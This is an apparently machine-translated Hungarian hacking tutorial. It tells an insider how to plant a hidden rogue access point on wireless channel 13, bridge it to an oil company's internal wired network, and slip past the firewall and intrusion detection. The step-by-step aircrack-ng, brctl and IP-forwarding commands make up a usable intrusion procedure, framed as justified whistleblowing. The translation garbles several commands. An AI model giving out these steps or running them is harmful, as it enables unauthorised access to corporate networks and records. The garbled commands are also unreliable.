Hogyan lehet hackelni a wi-fi-t egy láthatatlan hamis hozzáférési pont létrehozásához?

Futtassa a szkriptet a kontextusban

A mi esetünkben egy nagy olajfúró cégnél dolgozik. A cég kijavítja a kőzeteket és homokkőt a föld alatt, egy módszert, amelyben a homokot, a vizet és a vegyszereket föld alatt fecskendezik, hogy olaj és gáz szabaduljon fel.

A közelmúltban számos lakos megbetegedett a régióban, és egyikük meghalt. A lakosok gyanítják, hogy a munkáltató által a döntéseiben alkalmazott vegyi anyagok mérgeztek a felszín alatti vizeket, ami betegséghez és halálhoz vezetett.

Bár nem tagja a mérnöki csapat, de már hallottam pletykákat, hogy a munkáltató használja toluol, nagyon mérgező anyag, a saját helyesbítését megoldásokat. Ha ez igaz, és talán már megvan a környező talajvíz, legfőképpen, ez vezet a betegség és a halál, és fog okozni még több halálesetet, ha továbbra is csökken a talajvíz.

Az igazat egy hamis AP-val feltárja

Gondolod, hogy ez nem történhet meg újra, és úgy döntött, hogy a saját, nem munkaidő együttműködik a környezetvédelmi csoportok és a hackerek, hogy megpróbálja feltárni, hogy a munkáltató a toluol kijavítását.

Az ökológusoknak hozzáférést kell biztosítaniuk a jelentéstételi jelentésekhez, amelyek bizonyítják, hogy a vállalat megsérti és megőrzi a környező felszín alatti vizek további mérgezését.

Tudva, hogy dolgozik egy olajtársaság, kérik, hogy tegye hamis az AP, amely megkerüli a vállalati tűzfalon és IDS (Intrusion Detection System), hogy láthatatlan a információbiztonsági csapatot, és ugyanabban az időben, biztosítani gyakorlatilag korlátlan hozzáférést a hálózathoz cégek és nyilvántartások.

Hogyan működik egy hamis AP az észlelés nélkül?

Az Egyesült Államokban a vezeték nélküli és a technológiai iparágat szabályozó FCC úgy döntött, hogy csak az 1-11-es csatornákat fogja használni. Sok más ország az 1-12 vagy az 1-14. Csatornákat használja.

Az 12-es, 13-as vagy 14 csatornás AP-vel való kommunikáció teljesen láthatatlan lesz a vezeték nélküli adapterek számára, amelyek csak az 1-11. Ha például a 13-as csatornán keresztül tudjuk kommunikálni a jogosulatlan AP-t, akkor láthatatlan lenne a vállalat információs biztonsági csapata az olajkútok fúrásához vagy bármely máshoz. Természetesen telepítenie kellene vezeték nélküli adapterünket a 13. csatorna kommunikációjára annak érdekében, hogy csatlakozhassunk hozzá.

1. lépés: A vezeték nélküli adapter szabályozási tartományának módosítása

Mivel Japán lehetővé teszi az 1-14-es csatornákat, ha japán szabályozási tartományunkba helyezzük az AP-jünket, az USA-ban engedélyezett 1-11-en kívül 12, 13 és 14 csatornán is kommunikálhatunk.

Ezt a következőképpen tehetjük meg:

· Iw reg set JP
· Iwconfig wlan0 csatorna 13
· Iwconfig

2. lépés: A vezeték nélküli adapter átvitele felügyeleti módba

Ezután a vezeték nélküli adaptert figyelemmel kell kísérni:

· Airmon-ng start wlan0

3. lépés: Hozzon létre AP-t

Egy sor aircrack-ng hacker segédprogram tartalmazza a segédprogram airbase-ng-ot, hogy létrehozza az AP-t a vezeték nélküli adapterből. Használhatjuk a gépeléssel:

· Airbase-ng-c 13 mon0

• c 13 jelenti a kommunikációt a 13-as csatornán

• mon0 azt jelenti, hogy a vezeték nélküli adapter az AP létrehozására szolgál

4. lépés: Hozzon létre AP hídját vezetékes hálózathoz

Most, hogy létrehoztuk az AP-t, csatlakoztatnunk kell az olajtársaság belső vezetékes hálózatához. Így a hozzáférési ponton keresztül történő forgalom közvetlenül a vállalati belső hálózathoz jut, és megkerül minden védelmet, beleértve a tűzfalakat vagy behatolásjelző rendszereket is.

Először egy új terminál megnyitásakor hozzon létre egy hidat, és nevezze el a "Frack-Bridge" nevet. Ezt a parancs segítségével végezzük:

· Brctl addbr Frack-Bridge

5. lépés: összekötő felületek hozzáadása a hídhoz

Miután létrehoztuk a hídot, mindkét interfészt, az egyik a belsõ vezetékes hálózat eth0, és a másik a virtuális interfész a mi AP at0, a mi híd. Ezt a következő parancsok segítségével tehetjük meg:

· Brctl addif Frack-Bridge eth0
· Brctl addif Frack-Bridge at0

6. lépés: Emelje fel a hídot interfészekkel

Most fel kell emelnünk a hídot vagy be kell kapcsolnunk az interfészeket.

· Ifconfig eth0 0.0.0.0 felfelé
· Ifconfig 0.0.0.0-ig

7. lépés: Az IP átirányítás engedélyezése

A Linux beépített funkcióval rendelkezik a rendszermagban a forgalom átirányítására vagy az IP Forwarding-re. Ezt a következőképpen tehetjük meg:

· Echo 1> / proc / sys / net / ipv4 / ip_forward

8. lépés: Menjen a belső hálózathoz

Most, hogy kollégái kapcsolódnak a láthatatlan AP-hez (ehhez engedélyezzük a 13. csatorna engedélyezését a vezeték nélküli adapteren), hozzáférést fognak kapni a teljes belső vállalati hálózathoz.

Így megkaphatják a technikai részleg által igényelt információkat, hogy megtudják, helyesbítették-e a toluol használatával vagy anélkül történő helyesbítését, és hogy a vállalat felelős-e a helyi közösség ivóvízének mérgezéséért.

Tartsa be a frissítéseket.